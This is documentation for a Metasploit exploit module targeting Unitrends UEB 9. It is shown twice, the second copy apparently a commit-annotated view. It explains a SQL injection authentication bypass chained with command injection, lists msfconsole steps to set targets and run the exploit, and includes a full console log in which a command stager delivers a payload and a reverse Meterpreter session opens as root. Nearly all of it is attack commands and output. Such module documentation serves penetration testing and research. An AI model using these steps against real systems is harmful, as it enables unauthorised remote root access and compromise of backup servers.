documentation/modules/exploit/linux/http/ueb9_api_storage.md

## Vulnerable Application

  Unitrends UEB 9 http api/storage remote root

  This exploit leverages a sqli vulnerability for authentication bypass,
  together with command injection for subsequent root RCE.

## Verification Steps

  1. ```use exploit/linux/http/ueb9_api_storage ```
  2. ```set lhost [IP]```
  3. ```set rhost [IP]```
  4. ```exploit```
  5. A meterpreter session should have been opened successfully

## Scenarios

### UEB 9.1 on CentOS 6.5

```
msf > use exploit/linux/http/ueb9_api_storage
msf exploit(ueb9_api_storage) > set rhost 10.0.0.230
rhost => 10.0.0.230
msf exploit(ueb9_api_storage) > set lhost 10.0.0.141
lhost => 10.0.0.141
msf exploit(ueb9_api_storage) > exploit

[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 10.0.0.230:443 - pwn'ng ueb 9....
[*] Command Stager progress -  19.83% done (164/827 bytes)
[*] Command Stager progress -  39.30% done (325/827 bytes)
[*] Command Stager progress -  57.44% done (475/827 bytes)
[*] Command Stager progress -  75.45% done (624/827 bytes)
[*] Command Stager progress -  93.35% done (772/827 bytes)
[*] Command Stager progress - 110.88% done (917/827 bytes)
[*] Sending stage (826872 bytes) to 10.0.0.230
[*] Command Stager progress - 126.72% done (1048/827 bytes)
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```
initial commit for UEB9 exploits - CVE-2017-12477, CVE-2017-12478 2017-10-06 09:38:33 -06:00			`## Vulnerable Application`

			`Unitrends UEB 9 http api/storage remote root`

			`This exploit leverages a sqli vulnerability for authentication bypass,`
			`together with command injection for subsequent root RCE.`

			`## Verification Steps`

			1. ```use exploit/linux/http/ueb9_api_storage ```
			2. ```set lhost [IP]```
			3. ```set rhost [IP]```
			4. ```exploit```
			`5. A meterpreter session should have been opened successfully`

			`## Scenarios`

			`### UEB 9.1 on CentOS 6.5`

			```
			`msf > use exploit/linux/http/ueb9_api_storage`
			`msf exploit(ueb9_api_storage) > set rhost 10.0.0.230`
			`rhost => 10.0.0.230`
			`msf exploit(ueb9_api_storage) > set lhost 10.0.0.141`
			`lhost => 10.0.0.141`
			`msf exploit(ueb9_api_storage) > exploit`

			`[*] Started reverse TCP handler on 10.0.0.141:4444`
			`[*] 10.0.0.230:443 - pwn'ng ueb 9....`
			`[*] Command Stager progress - 19.83% done (164/827 bytes)`
			`[*] Command Stager progress - 39.30% done (325/827 bytes)`
			`[*] Command Stager progress - 57.44% done (475/827 bytes)`
			`[*] Command Stager progress - 75.45% done (624/827 bytes)`
			`[*] Command Stager progress - 93.35% done (772/827 bytes)`
			`[*] Command Stager progress - 110.88% done (917/827 bytes)`
			`[*] Sending stage (826872 bytes) to 10.0.0.230`
			`[*] Command Stager progress - 126.72% done (1048/827 bytes)`
			`[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400`

			`meterpreter > getuid`
			`Server username: uid=0, gid=0, euid=0, egid=0`
			```